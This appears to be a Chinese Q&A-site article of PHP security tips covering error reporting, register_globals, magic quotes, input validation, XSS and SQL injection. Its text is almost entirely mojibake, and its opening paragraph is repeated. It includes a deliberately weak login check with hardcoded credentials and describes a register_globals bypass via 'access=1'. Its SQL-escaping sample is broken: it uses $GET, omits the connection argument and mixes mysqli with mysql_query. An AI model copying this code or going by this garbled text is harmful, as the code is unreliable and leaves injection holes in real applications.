大家é½ç¥éPHPå·²ç»æ¯å½åææµè¡çWebåºç¨ç¼ç¨è¯è¨äºãä½æ¯ä¹ä¸å
¶ä»èæ¬è¯è¨ä¸æ ·ï¼PHPä¹æå 个å¾å±é©çå®å
¨æ¼æ´ãæ以å¨è¿ç¯æå¦æç« ä¸ï¼æ们å°å¤§è´ççå 个å®ç¨çæå·§æ¥è®©ä½ é¿å
ä¸äºå¸¸è§çPHPå®å
¨é®é¢ã
大家é½ç¥éPHPå·²ç»æ¯å½åææµè¡çWebåºç¨ç¼ç¨è¯è¨äºãä½æ¯ä¹ä¸å
¶ä»èæ¬è¯è¨ä¸æ ·ï¼PHPä¹æå 个å¾å±é©çå®å
¨æ¼æ´ãæ以å¨è¿ç¯æå¦æç« ä¸ï¼æ们å°å¤§è´ççå 个å®ç¨çæå·§æ¥è®©ä½ é¿å
ä¸äºå¸¸è§çPHPå®å
¨é®é¢ã
æå·§1ï¼ä½¿ç¨åéçé误æ¥å
ä¸è¬å¨å¼åè¿ç¨ä¸ï¼å¾å¤ç¨åºåæ»æ¯å¿äºå¶ä½ç¨åºé误æ¥åï¼è¿æ¯æ大çé误ï¼å 为æ°å½çé误æ¥åä¸ä»
ä»
æ¯æ好çè°è¯å·¥å
·ï¼ä¹æ¯æä½³çå®å
¨æ¼æ´æ£æµå·¥å
·ï¼è¿è½è®©ä½ æåºç¨çæ£ä¸çº¿åå°½å¯è½æ¾åºä½ å°ä¼éå°çé®é¢ã
å½ç¶ä¹æå¾å¤æ¹å¼å»å¯ç¨é误æ¥åãæ¯å¦å¨ php.iné
ç½®æ件ä¸ä½ å¯ä»¥è®¾ç½®å¨è¿è¡æ¶å¯ç¨
å¯å¨é误æ¥å
error_reporting(E_ALL);
åç¨é误æ¥å
error_reporting(0);
æå·§2ï¼ä¸ä½¿ç¨PHPçWeakå±æ§
æå 个PHPçå±æ§æ¯éè¦è¢«è®¾ç½®ä¸ºOFFçãä¸è¬å®ä»¬é½åå¨äºPHP4éé¢ï¼èå¨PHP5ä¸æ¯ä¸æ¨è使ç¨çãå°¤å
¶æåå¨PHP6éé¢ï¼è¿äºå±æ§é½è¢«ç§»é¤äºã
注åå
¨å±åé
å½ register_globals 被设置为ONæ¶ï¼å°±ç¸å½äºè®¾ç½®Environmentï¼GET,POST,COOKIEæè
Serveråéé½å®ä¹ä¸ºå
¨å±åéãæ¤æ¶ä½ æ ¹æ¬ä¸éè¦å»å $_POST['username']æ¥è·å表ååé'username'ï¼åªéè¦'$username'å°±è½è·åæ¤åéäºã
é£ä¹ä½ è¯å®å¨æ³æ¢ç¶è®¾ç½®register_globals 为 ON æè¿ä¹æ¹ä¾¿ç好å¤ï¼é£ä¸ºä»ä¹ä¸è¦ä½¿ç¨å¢ï¼å 为å¦æä½ è¿æ ·åå°ä¼å¸¦æ¥å¾å¤å®å
¨æ§çé®é¢ï¼èä¸ä¹å¯è½ä¸å±é¨åéå称ç¸å²çªã
æ¯å¦å
ççä¸é¢ç代ç ï¼
if( !empty( $_POST['username'] ) &&$_POST['username'] == âtest123â² && !empty( $_POST['password'] )&& $_POST['password'] == âpass123â³ )
{
$access = true;
}
å¦æè¿è¡æé´, register_globals 被设置为ONï¼é£ä¹ç¨æ·åªéè¦ä¼ è¾ access=1 å¨ä¸å¥æ¥è¯¢å符串ä¸å°±è½è·åå°PHPèæ¬è¿è¡çä»»ä½ä¸è¥¿äºã
å¨.htaccessä¸åç¨å
¨å±åé
php_flag register_globals 0
å¨php.iniä¸åç¨å
¨å±åé
register_globals = Off
åç¨ç±»ä¼¼ magic_quotes_gpc,magic_quotes_runtime, magic_quotes_sybase è¿äºMagicQuotes
å¨.htaccessæ件ä¸è®¾ç½®
php_flag magic_quotes_gpc 0
php_flag magic_quotes_runtime 0
å¨php.iniä¸è®¾ç½®
magic_quotes_gpc = Off
magic_quotes_runtime = Off
magic_quotes_sybase = Off
æå·§3ï¼éªè¯ç¨æ·è¾å
¥
ä½ å½ç¶ä¹å¯ä»¥éªè¯ç¨æ·çè¾å
¥ï¼é¦å
å¿
é¡»ç¥éä½ ææç¨æ·è¾å
¥çæ°æ®ç±»åãè¿æ ·å°±è½å¨æµè§å¨ç«¯å好é²å¾¡ç¨æ·æ¶ææ»å»ä½ çåå¤ã
æå·§4ï¼é¿å
ç¨æ·è¿è¡äº¤åç«ç¹èæ¬æ»å»
å¨Webåºç¨ä¸ï¼é½æ¯ç®åå°æ¥åç¨æ·è¾å
¥è¡¨åç¶ååé¦ç»æãå¨æ¥åç¨æ·è¾å
¥æ¶ï¼å¦æå
许HTMLæ ¼å¼è¾å
¥å°æ¯é常å±é©çäºæ
ï¼å 为è¿ä¹å°±å
许äºJavaScript以ä¸å¯é¢æçæ¹å¼ä¾µå
¥åç´æ¥æ§è¡ãåªæåªè¦æä¸ä¸ªè¿æ ·æ¼æ´ï¼cookieæ°æ®é½å¯è½è¢«çåè¿è导è´ç¨æ·çè´¦æ·è¢«çåã
æå·§5ï¼é¢é²SQL注å
¥æ»å»
PHPåºæ¬æ²¡ææä¾ä»»ä½å·¥å
·æ¥ä¿æ¤ä½ çæ°æ®åºï¼æ以å½ä½ è¿æ¥æ°æ®åºæ¶ï¼ä½ å¯ä»¥ä½¿ç¨ä¸é¢è¿ä¸ªmysqli_real_escape_string å½æ°ã
$username = mysqli_real_escape_string($GET['username'] );
mysql_query( âSELECT * FROM tbl_employeeWHERE username = ââ.$username.âââ);
好äºï¼å¨è¿ç¯ç®ççæç« ä¸ï¼æ们éè¿°äºå 个å¼åè¿ç¨ä¸ä¸è½å¿½è§çPHPå®å
¨æ§é®é¢ãä½æ¯æç»æ¯å¦ä½¿ç¨ï¼å¦ä½ä½¿ç¨è¿æ¯å¼å人åæ¥å³å®çãå¸æè¿ç¯æç« è½å¸®å©å°ä½ 们ã
温馨提示:答案为网友推荐,仅供参考